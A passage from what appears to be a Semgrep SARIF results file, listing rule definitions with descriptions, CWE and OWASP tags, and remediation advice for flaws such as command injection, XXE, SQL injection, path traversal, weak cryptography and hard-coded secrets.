python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"CodeClimate detected"},"help":{"markdown":"CodeClimate detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"CodeClimate detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate","id":"generic.secrets.security.detected-codeclimate.detected-codeclimate","name":"generic.secrets.security.detected-codeclimate.detected-codeclimate","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-codeclimate.detected-codeclimate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"help":{"markdown":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"helpUri":"https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","id":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","name":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"help":{"markdown":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context)\n - [https://tools.ietf.org/html/rfc7568](https://tools.ietf.org/html/rfc7568)\n - [https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html](https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html)\n","text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context","id":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","name":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.weak-ssl-context.weak-ssl-context"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","id":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","name":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","id":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","name":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"help":{"markdown":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command)\n - [https://www.stackhawk.com/blog/command-injection-java/](https://www.stackhawk.com/blog/command-injection-java/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java](https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java)\n","text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command","id":"java.spring.security.injection.tainted-system-command.tainted-system-command","name":"java.spring.security.injection.tainted-system-command.tainted-system-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-system-command.tainted-system-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","id":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","name":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","properties":{"precision":"very-high","tags":["CWE-183: Permissive List of Allowed Inputs","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","id":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","name":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","id":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","name":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"File name based on user input risks server-side request forgery."},"help":{"markdown":"File name based on user input risks server-side request forgery.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"File name based on user input risks server-side request forgery."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename","id":"php.lang.security.injection.tainted-filename.tainted-filename","name":"php.lang.security.injection.tainted-filename.tainted-filename","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-filename.tainted-filename"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","id":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","name":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"help":{"markdown":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","id":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","name":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"help":{"markdown":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","id":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","name":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","id":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","name":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","id":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","name":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: 